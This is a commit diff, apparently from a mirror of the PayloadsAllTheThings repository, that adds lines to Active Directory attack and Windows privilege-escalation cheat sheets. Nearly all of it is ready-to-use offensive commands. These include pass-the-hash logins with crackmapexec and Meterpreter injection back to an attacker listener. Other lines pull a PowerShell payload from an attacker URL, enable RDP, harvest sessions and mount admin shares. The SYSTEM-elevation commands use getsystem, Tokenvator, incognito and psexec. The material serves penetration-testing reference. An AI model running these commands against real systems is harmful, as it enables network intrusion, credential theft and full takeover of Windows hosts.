admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

SSRF SVG + Windows Token getsystem

Browse Source
This commit is contained in:
Swissky
2019-08-15 18:21:06 +02:00
parent 9a8b2fee8e
commit b6697d8595
8 changed files with 57 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
Methodology and Resources/Active Directory Attack.md
View File

@@ -55,6 +55,7 @@
crackmapexec smb -M name_module -o VAR=DATA
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
@@ -170,13 +171,13 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
```powershell
$ nmap -sV -sC 10.10.10.10
Linux> $ nmap -sV -sC 10.10.10.10
clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
$ sudo date -s "14 APR 2015 18:25:16"
Linux> sudo date -s "14 APR 2015 18:25:16"
Windows> net time /domain /set
```
### Open Shares
```powershell
@@ -230,6 +231,7 @@ Mount a share
```powershell
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL

11
Methodology and Resources/Windows - Privilege Escalation.md
View File

@@ -18,6 +18,7 @@
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
@@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml
## EoP - Impersonation Privileges
### Meterpreter getsystem and alternatives
```powershell
meterpreter> getsystem
Tokenvator.exe getsystem cmd.exe
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
psexec -s -i cmd.exe
python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
```
### RottenPotato (Token Impersonation)
Binary available at : https://github.com/foxglovesec/RottenPotato